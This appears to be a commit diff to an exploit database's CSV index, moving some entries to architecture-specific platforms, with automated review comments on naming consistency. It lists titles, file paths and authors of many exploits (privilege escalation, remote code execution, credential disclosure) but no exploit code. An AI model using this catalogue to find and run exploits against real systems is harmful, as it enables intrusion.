DB: 2017-02-01
65 new exploits

Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow
Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service
PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow
PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)
Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service
Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service
Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service
ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)
ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)
Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service
VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read
Samba < 3.6.2 (x86) - Denial of Serviec (PoC)
Adobe Flash - Bad Dereference at 0x23c on Linux x64
Adobe Flash (Linux x64) - Bad Dereference at 0x23c
Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited
Core FTP Server 32-bit Build 587 - Heap Overflow
Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)
Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)
RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation
RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation
Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation
Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation
Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid)
Qpopper 4.0.8 (Linux) - (poppassd) Privilege Escalation
Wireless Tools 26 (IWConfig) - Privilege Escalation
Qpopper 4.0.8 (Linux) - 'poppassd' Privilege Escalation
Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure
Rocks Clusters 4.1 - (umount-loop) Privilege Escalation
Rocks Clusters 4.1 - (mount-loop) Privilege Escalation
Rocks Clusters 4.1 - 'umount-loop' Privilege Escalation
Rocks Clusters 4.1 - 'mount-loop' Privilege Escalation
PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure
Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation
Postfix 2.6-20080814 - (symlink) Privilege Escalation
Postfix 2.6-20080814 - 'symlink' Privilege Escalation
Oracle Database Vault - ptrace(2) Privilege Escalation
Oracle Database Vault - 'ptrace(2)' Privilege Escalation
Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit
Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation
GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load (Privilege Escalation)
GNU C Library 2.x (libc6) - (Dynamic Linker LD_AUDIT Arbitrary DSO Load) Privilege Escalation
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)
Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)
Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit)
VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)
PolicyKit polkit-1 < 0.101 - Linux Privilege Escalation
PolicyKit polkit-1 < 0.101 - Privilege Escalation
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail) (1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail 8.10.1) (2)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2)
QNX RTOS 4.25/6.1 - phgrafxPrivilege Escalation
QNX RTOS 4.25/6.1 - phgrafx-startup Privilege Escalation
QNX RTOS 4.25/6.1 - 'phgrafx' Privilege Escalation
QNX RTOS 4.25/6.1 - 'phgrafx-startup' Privilege Escalation
Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure
Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)
Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)
MySQL 3.23.x - mysqld Privilege Escalation
MySQL 3.23.x - 'mysqld' Privilege Escalation
Platform Load Sharing Facility 4/5/6 - EAuth Privilege Escalation
MTools 3.9.x - MFormat Privilege Escalation
Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation
MTools 3.9.x - 'MFormat' Privilege Escalation
Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)
sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass
sudo 1.8.0 < 1.8.3p1 (sudo_debug) - glibc FORTIFY_SOURCE Bypass + Privilege Escalation
Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)
ZABBIX 1.1.4/1.4.2 - daemon_start Privilege Escalation
ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)
LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure
Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation
Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation
Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)
TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure
Linux Kernel 3.13 - Privilege Escalation PoC (SGID)
Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC)
OSSEC 2.8 - hosts.deny Privilege Escalation
OSSEC 2.8 - 'hosts.deny' Privilege Escalation
Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition
Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation
Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)
Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)
Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation
Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)
RHEL 7.0/7.1 - abrt/sosreport Privilege Escalation
RHEL 7.0/7.1 - 'abrt/sosreport' Privilege Escalation
MySQL 5.5.45 (x64) - Local Credentials Disclosure
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation
ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation
Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)
Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)
Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation
Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
Viscosity 1.6.7 - Privilege Escalation
BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution
BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution
Solaris /bin/login (SPARC/x86) - Remote Code Execution
gpsdrive 2.09 (x86) - (friendsd2) Remote Format String
PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)
dproxy-nexgen (Linux/x86) - Buffer Overflow
dproxy-nexgen (Linux x86) - Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)
AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)
32bit FTP Client - Stack Buffer Overflow (Metasploit)
Free Download Manager - Remote Control Server Buffer Overflow (Metasploit)
Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)
Apache (Windows x86) - Chunked Encoding (Metasploit)
PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)
CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)
Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)
Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)
Webmin 0.x - RPC Function Privilege Escalation
Webmin 0.x - 'RPC' Function Privilege Escalation
Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit
Nginx 1.4.0 (x64) - (Generic Linux) Remote Exploit
Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit
technote 7.2 - Remote File Inclusion
Technote 7.2 - Remote File Inclusion
JAWS 0.2/0.3 - 'index.php' gadget Parameter Traversal Arbitrary File Access
JAWS 0.2/0.3 - Cookie Manipulation Authentication Bypass
JAWS 0.2/0.3 - 'index.php' action Parameter Cross-Site Scripting
Jaws 0.2/0.3 - 'gadget' Parameter Traversal Arbitrary File Access
Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass
Jaws 0.2/0.3 - 'action' Parameter Cross-Site Scripting
JAWS 0.2/0.3/0.4 - ControlPanel.php SQL Injection
Jaws 0.2/0.3/0.4 - ControlPanel.php SQL Injection
JAWS Glossary 0.4/0.5 - Cross-Site Scripting
Jaws Glossary 0.4/0.5 - Cross-Site Scripting
JAWS 0.x - Remote File Inclusion
Jaws 0.x - Remote File Inclusion
FlatNux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities
Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities
Multiple Netgear Routers - Password Disclosure
Video Sharing Script 4.94 - 'uid' Parameter SQL Injection
Netman 204 - Backdoor Account / Password Reset
parent bf6526a40b
commit 1a4e6f50a9
70 changed files with 574 additions and 135 deletions
204
files.csv
|
@ -356,7 +356,7 @@ id,file,description,date,author,platform,type,port
|
|||
1967,platforms/windows/dos/1967.c,"Microsoft Windows - TCP/IP Protocol Driver Remote Buffer Overflow",2006-06-30,Preddy,windows,dos,0
|
||||
1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service",2006-07-01,y3dips,multiple,dos,0
|
||||
1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client - CG_ServerCommand() Remote Overflow",2006-07-02,RunningBon,windows,dos,0
|
||||
1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,windows,dos,0
|
||||
1977,platforms/win_x86/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,win_x86,dos,0
|
||||
1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - (long http post) Denial of Service",2006-07-04,n00b,windows,dos,0
|
||||
1984,platforms/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - (SFX Path) Stack Overflow",2006-07-05,posidron,windows,dos,0
|
||||
1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0
|
||||
|
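Review bot: Row 1977 is reclassified to platform win_x86, but row 1976 directly above it (same Quake 3 Engine Client target, same author, same date) stays under platforms/windows with platform windows. If 1976 is equally x86-only it should move in this change too; otherwise a filter on win_x86 returns one entry of the pair and not the other. The file column for 1977 is rewritten to platforms/win_x86/dos/1977.cpp as well, so the script itself has to be moved in the same commit or the index points at a path that does not exist.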
@ -531,7 +531,7 @@ id,file,description,date,author,platform,type,port
|
|||
3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode Buffer Overflow",2007-03-12,Marsu,windows,dos,0
|
||||
3514,platforms/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash",2007-03-18,DATA_SNIPER,windows,dos,0
|
||||
3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service",2007-03-20,MADYNES,hardware,dos,0
|
||||
3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service",2007-03-20,mu-b,windows,dos,0
|
||||
3527,platforms/win_x86/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service",2007-03-20,mu-b,win_x86,dos,0
|
||||
3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone - (Digest domain) Denial of Service",2007-03-21,MADYNES,hardware,dos,0
|
||||
3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service",2007-03-22,DiGitalX,windows,dos,0
|
||||
3566,platforms/multiple/dos/3566.pl,"Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service",2007-03-25,MADYNES,multiple,dos,0
|
||||
|
@ -622,12 +622,12 @@ id,file,description,date,author,platform,type,port
|
|||
4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x - SIP phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos,0
|
||||
4288,platforms/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos,0
|
||||
4289,platforms/windows/dos/4289.php,"EFS Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0
|
||||
4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow",2007-08-18,boecke,windows,dos,0
|
||||
4293,platforms/win_x86/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow",2007-08-18,boecke,win_x86,dos,0
|
||||
4294,platforms/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0
|
||||
4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0
|
||||
4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0
|
||||
4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,windows,dos,0
|
||||
4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,windows,dos,0
|
||||
4318,platforms/win_x86/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,win_x86,dos,0
|
||||
4319,platforms/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0
|
||||
4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash",2007-08-29,wushi,windows,dos,0
|
||||
4337,platforms/windows/dos/4337.c,"Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
|
||||
|
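Review bot: The two rows moved to win_x86 here quote the extension name differently: 4293 keeps the parenthesised "(PHP_win32sti)" while 4318 uses the quoted "'PHP_iisfunc.dll'". Since both rows are being touched anyway, pick one form and apply it to both. Row 4304 between them (PHP 5.2.3, PHP_ntuser) is a local overflow in the same family of Windows PHP extensions and stays under windows; worth confirming that split is intentional rather than a side effect of its title lacking a "(Windows x86)" tag.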
@ -1044,7 +1044,7 @@ id,file,description,date,author,platform,type,port
|
|||
8601,platforms/windows/dos/8601.txt,"EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0
|
||||
8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service (PoC)",2009-05-04,shinnai,windows,dos,0
|
||||
8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0
|
||||
8611,platforms/windows/dos/8611.pl,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",windows,dos,0
|
||||
8611,platforms/win_x86/dos/8611.pl,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",win_x86,dos,0
|
||||
8617,platforms/windows/dos/8617.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow (PoC)",2009-05-05,Cyber-Zone,windows,dos,0
|
||||
8625,platforms/windows/dos/8625.pl,"Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow (PoC)",2009-05-07,GoLd_M,windows,dos,0
|
||||
8644,platforms/windows/dos/8644.pl,"ViPlay3 < 3.00 - '.vpl' Local Stack Overflow (PoC)",2009-05-08,LiquidWorm,windows,dos,0
|
||||
|
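Review bot: Row 8611 is moved to win_x86 although its description carries no architecture tag; the only x86 hint in "32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)" is the product name. The other rows this commit moves to win_x86 say "(Windows x86)" in the description, so either add the tag here or keep the row under windows if the reclassification was matched on the product name alone.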
@ -1183,7 +1183,7 @@ id,file,description,date,author,platform,type,port
|
|||
9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0
|
||||
9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)",2009-09-09,"laurent gaffie",windows,dos,0
|
||||
9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,windows,dos,0
|
||||
9606,platforms/windows/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0
|
||||
9606,platforms/win_x86/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",win_x86,dos,0
|
||||
9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0
|
||||
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",windows,dos,0
|
||||
9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos,0
|
||||
|
@ -1243,7 +1243,7 @@ id,file,description,date,author,platform,type,port
|
|||
10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515
|
||||
10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0
|
||||
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21
|
||||
10102,platforms/windows/dos/10102.pl,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",windows,dos,80
|
||||
10102,platforms/win_x86/dos/10102.pl,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",win_x86,dos,80
|
||||
10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - 'jar50.dll' Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0
|
||||
10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service",2009-11-13,zhangmc,windows,dos,21
|
||||
10106,platforms/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - 'aswMon2.sys' Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
|
||||
|
@ -1520,7 +1520,7 @@ id,file,description,date,author,platform,type,port
|
|||
12425,platforms/windows/dos/12425.html,"Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service",2010-04-27,Dr_IDE,windows,dos,0
|
||||
12431,platforms/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0
|
||||
12437,platforms/windows/dos/12437.html,"Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0
|
||||
12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0
|
||||
12457,platforms/win_x86/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2010-04-29,ITSecTeam,win_x86,dos,0
|
||||
12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0
|
||||
12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
|
||||
12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0
|
||||
|
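Review bot: Row 12457 ends up with a description that is character-for-character the same as row 10102 in the hunk at -1243 ("Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service"), yet the two rows differ in author, date and port. Anyone searching the index by title cannot tell them apart; since the row is being rewritten anyway, add a distinguishing detail to one of the descriptions.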
@ -1533,7 +1533,7 @@ id,file,description,date,author,platform,type,port
|
|||
12518,platforms/windows/dos/12518.pl,"Microsoft Paint - Integer Overflow (Denial of Service) (MS10-005)",2010-05-06,unsign,windows,dos,0
|
||||
12524,platforms/windows/dos/12524.py,"Microsoft Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service",2010-05-07,"Jelmer de Hen",windows,dos,0
|
||||
12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0
|
||||
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
|
||||
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
|
||||
12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0
|
||||
12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos,0
|
||||
12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial of Service",2010-05-09,"Yakir Wizman",windows,dos,0
|
||||
|
@ -4244,7 +4244,7 @@ id,file,description,date,author,platform,type,port
|
|||
33559,platforms/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 - 'admin' Server Denial of Service",2010-01-22,Intevydis,multiple,dos,0
|
||||
33560,platforms/multiple/dos/33560.txt,"Sun Java System Web Server 6.1/7.0 - WebDAV Format String",2010-01-22,Intevydis,multiple,dos,0
|
||||
33571,platforms/linux/dos/33571.txt,"PostgreSQL - 'bitsubstr' Buffer Overflow",2010-01-27,Intevydis,linux,dos,0
|
||||
33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",linux,dos,0
|
||||
33585,platforms/lin_x86-64/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",lin_x86-64,dos,0
|
||||
33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0
|
||||
33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",multiple,dos,0
|
||||
33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0
|
||||
|
@ -4388,7 +4388,7 @@ id,file,description,date,author,platform,type,port
|
|||
35173,platforms/linux/dos/35173.txt,"Minix 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,linux,dos,0
|
||||
35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0
|
||||
35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0
|
||||
35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0
|
||||
35182,platforms/win_x86/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,win_x86,dos,0
|
||||
35202,platforms/windows/dos/35202.py,"Microsoft Internet Explorer 11 - Denial of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0
|
||||
35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File - 'CdrTxt.dll' Off-by-One Stack Corruption",2014-11-12,LiquidWorm,windows,dos,0
|
||||
35240,platforms/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0
|
||||
|
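Review bot: Row 35182 moves to win_x86, but nothing in its description states an architecture; "vmx86.sys" is the name of the driver, not a claim that the issue is limited to 32-bit hosts. If the entry really is x86-only, say so in the description the way the other moved rows do with "(Windows x86)"; if the move came from matching "x86" in the file name, it should stay under windows.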
@ -4513,7 +4513,7 @@ id,file,description,date,author,platform,type,port
|
|||
36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0
|
||||
36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
|
||||
36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0
|
||||
36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,linux,dos,0
|
||||
36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,lin_x86,dos,0
|
||||
36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0
|
||||
